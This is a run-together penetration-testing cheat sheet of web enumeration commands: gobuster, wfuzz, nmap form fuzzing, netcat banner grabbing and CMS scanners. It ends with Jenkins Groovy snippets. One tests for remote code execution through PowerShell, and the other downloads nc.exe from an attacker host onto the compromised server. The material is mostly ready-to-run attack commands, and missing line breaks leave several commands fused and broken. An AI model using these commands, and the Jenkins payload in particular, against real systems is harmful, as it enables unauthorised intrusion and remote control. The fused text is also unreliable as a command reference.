gobuster -u http://ip -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50gobuster -u http://ip/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.phpgobuster -s "200,204,301,302,307,403,500" -w /usr/share/seclists/Discovery/Web_Content/common.txt -u http://gobuster -s "200,204,301,302,307,403,500" -u http://XXXX -wgobuster -u http://ip -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40Gobuster comprehensive directory bustinggobuster -s 200,204,301,302,307,403 -u iop -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'Gobuster quick directory bustinggobuster -u ip -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
​
wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZwfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZwfuzz -c -z range,1-65535 --hl=2 http://ip:60000/url.php?path=1 27.0.0.1:FUZZwfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 158607 http://bart.htb/FUZZ​
Nmap HTTP Form Fuzzer
nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip
​
Robot.txt audit
parsero -u http://X
​
Banner Grabbing
nc -v ip port
​
CMSmap
cmsmap.py https://x.x.x.x
​
wpscan -u ip/wp/​
droopescan scan -u $ip
WebdavTest incorrect permissions:​$ cadaver http://$ip$ davtest http://$ip​
Jenkins Script
Jenking groovy codeTesting to see if we have code execution…​def sout = new StringBuffer(), serr = new StringBuffer()def proc = 'powershell.exe $PSVERSIONTABLE'.execute()proc.consumeProcessOutput(sout, serr)proc.waitForOrKill(1000)println "out> $sout err> $serr"
Nc Upload in Jenkins Server
NC upload in jenkin Server​def process = "powershell -command Invoke-WebRequest 'http://ip/nc.exe' -OutFile nc.exe".execute();println("${process.text}");